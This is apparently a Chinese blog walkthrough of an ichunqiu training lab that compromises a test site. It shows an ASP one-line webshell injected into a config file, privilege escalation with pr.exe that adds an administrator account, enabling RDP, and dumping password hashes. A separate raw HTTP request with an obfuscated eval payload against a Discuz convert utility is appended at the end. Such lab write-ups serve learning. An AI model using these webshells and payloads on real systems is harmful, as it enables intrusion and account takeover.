这是一波 ichunqiu在线挑战攻略 -(一)

<–more–>

我很简单,不要欺负我

  1. 获取网站后台密码
  2. 提取权限
  3. 获取服务器密码

    后台管理密码获取

    到处都是注入点 会用注入工具就能注入出账号密码了比如Domain /阿D/Pangolin/甚至是神器sqlmap都可以解决
    详细过程我就跳过了 没什么意思

提权

拿到账号密码后 应该是找后台的登陆页面
首先可以进行猜测 admin 比如这样就能自动跳出路径了

进入后台后 应该是要想办法拿到shell
拿到shell方法有很多

  1. 直接上传拿shell
  2. 数据库备份拿shell
  3. 突破本地上传拿shell
  4. 上传其他脚本类型拿shell
  5. 截断
  6. 服务器解析漏洞
  7. 利用编辑器
  8. 修改配置文件
  9. 修改网站模板

找不到上传点好痛苦…看到配置文件可以修改 眼睛一亮 正好试试新到手都一句话木马能不能用

点击左侧的[系统设置管理]→[网站配置信息],随便找改地方插入一句话就好 如上图
之后用菜刀连接 我这里一句话是chr(97)) 97是a的Ascii码 所以一句话密码是a
http://www.test.inchunqiu/inc/config.asp这是连接地址
解释一下为什么是这里
/nc/config.asp 源码

1
2
3
4
5
6
7
8
9
<%
Const SiteName="魅力企业网站管理系统 2007 中英繁商业正式版" '网站名称
Const EnSiteName="MSCOM 2007" '网站名称
Const SiteTitle="魅力软件" '网站标题
Const EnSiteTitle="MelyySoft" '网站标题
Const SiteUrl="www.melyysoft.com" '网站地址
Const Miibeian="湘ICP备05011184号" '网站备案号
….
%>

构造一句话木马

1
"%><%Eval Request(Chr(97))%><%'

插入一句话木马后

1
2
3
4
5
6
7
8
9
<%
Const SiteName=""%><%Eval Request(Chr(35))%><% '" '网站名称
Const EnSiteName="MSCOM 2007" '网站名称
Const SiteTitle="魅力软件" '网站标题
Const EnSiteTitle="MelyySoft" '网站标题
Const SiteUrl="www.melyysoft.com" '网站地址
Const Miibeian="湘ICP备05011184号" '网站备案号
….
%>

整理规范以后

1
2
3
4
5
6
7
8
9
10
<%Const SiteName=""%>
<%Eval Request(Chr(35))%>
<% '" '网站名称
Const EnSiteName="MSCOM 2007" '网站名称
Const SiteTitle="魅力软件" '网站标题
Const EnSiteTitle="MelyySoft" '网站标题
Const SiteUrl="www.melyysoft.com" '网站地址
Const Miibeian="湘ICP备05011184号" '网站备案号
….
%>

所以插入一句话木马一定是要保证语法正确才能连接成功 所以一定要注意闭合
用菜刀连接刚刚的地址
2016/07/29/13:25:51
2016/07/29/13:25:54
在这里上传 提权都工具 这里我选择使用Pr
2016/07/29/13:25:59
2016/07/29/13:26:02
上传成功后 右键cmd.exe 使用虚拟终端连接
2016/07/29/13:26:05
之后可以开始提权了

1
pr.exe "net user hacker 123 /add & net localgroup administrators hacker /add"

2016/07/29/13:35:20
看图的左下角 已经将swing这个账号加入到管理员组了 之后用3389连接就好了
打开[开始]→[运行]→输入mstsc连接到目标机就好了 (目标机IP可以在场景拓扑图里看到)
在这之前先打开 3389
pr 3389
2016/07/29/13:42:18
连接到目标机
2016/07/29/13:59:20

获取服务器器管理密码

这里我选择用QuarksPwDum 对Hash的获取

2016/07/29/13:59:53
2016/07/29/14:00:16
使用图中的命令 打开工具
2016/07/29/14:01:00
成功打开
2016/07/29/14:01:32
使用命令获取hash
2016/07/29/14:01:59
成功获取hash 接下来要对hash进行解密 比如 这个连接
2016/07/29/14:03:03

Good 这样就解决啦!!! 鼓掌一下

POST /utility/convert/index.php?a=config&source=d7.2_x2.0 HTTP/1.1

Host: www.test.ichunqiu

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8

Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: keep-alive

Content-Length: 199

Content-Type: application/x-www-form-urlencoded

newconfig[aaa%0a%0deval(CHR(101).CHR(118).CHR(97).CHR(108).CHR(40).CHR(34).CHR(36).CHR(95).CHR(80).CHR(79).CHR(83).CHR(84).CHR(91).CHR(99).CHR(93).CHR(59).CHR(34).CHR(41).CHR(59));//]=aaaa&submit=yes

×

纯属好玩

扫码支持
扫码打赏,你说多少就多少

打开支付宝扫一扫,即可进行扫码打赏哦

文章目录
  1. 1. 我很简单,不要欺负我
    1. 1.1. 后台管理密码获取
    2. 1.2. 提权
    3. 1.3. 获取服务器器管理密码
,